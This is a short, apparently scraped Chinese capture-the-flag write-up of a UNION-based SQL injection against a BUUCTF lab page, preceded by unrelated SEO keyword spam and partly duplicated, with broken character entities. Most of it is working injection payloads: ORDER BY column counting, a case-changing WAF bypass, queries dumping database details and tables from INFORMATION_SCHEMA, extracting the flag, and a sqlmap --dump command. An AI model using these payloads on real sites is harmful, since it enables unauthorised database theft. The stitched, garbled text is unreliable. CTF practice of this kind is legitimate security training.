西安网站优化排名推广,项目开发平台有哪些,网络架构模式有什么,重庆可视化网站制作闭合之后尝试判断字段数#xff0c;存在WAF#xff0c;使用大小写绕过#xff08;后面的sql语句也需要进行大小写绕过#xff09; ?id1 Order by 5--
测出有5列 ?id1 Order by 6-- 查一下数据库名、版本、用户等信息
?id1Union Select database(),version(),user(),4,…闭合之后尝试判断字段数存在WAF使用大小写绕过后面的sql语句也需要进行大小写绕过 ?id1 Order by 5--
测出有5列 ?id1 Order by 6-- 查一下数据库名、版本、用户等信息
?id1Union Select database(),version(),user(),4,5 -- 查出数据库ctf下的表
?id0 uNion Select 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA ctf-- 尝试在表here_is_flag下查找flag
?id0 uNion Select 1,2,3,4,flag FROM ctf.here_is_flag-- flag{e66fd4f6-00ac-4a66-b47e-1af1355d5630}
或者使用sqlmap直接跑出所有库和表内容
sqlmap -u http://3d75c5bf-0a9e-41fc-bb45-e6877f646556.node4.buuoj.cn:81/?id1 --columns --dump
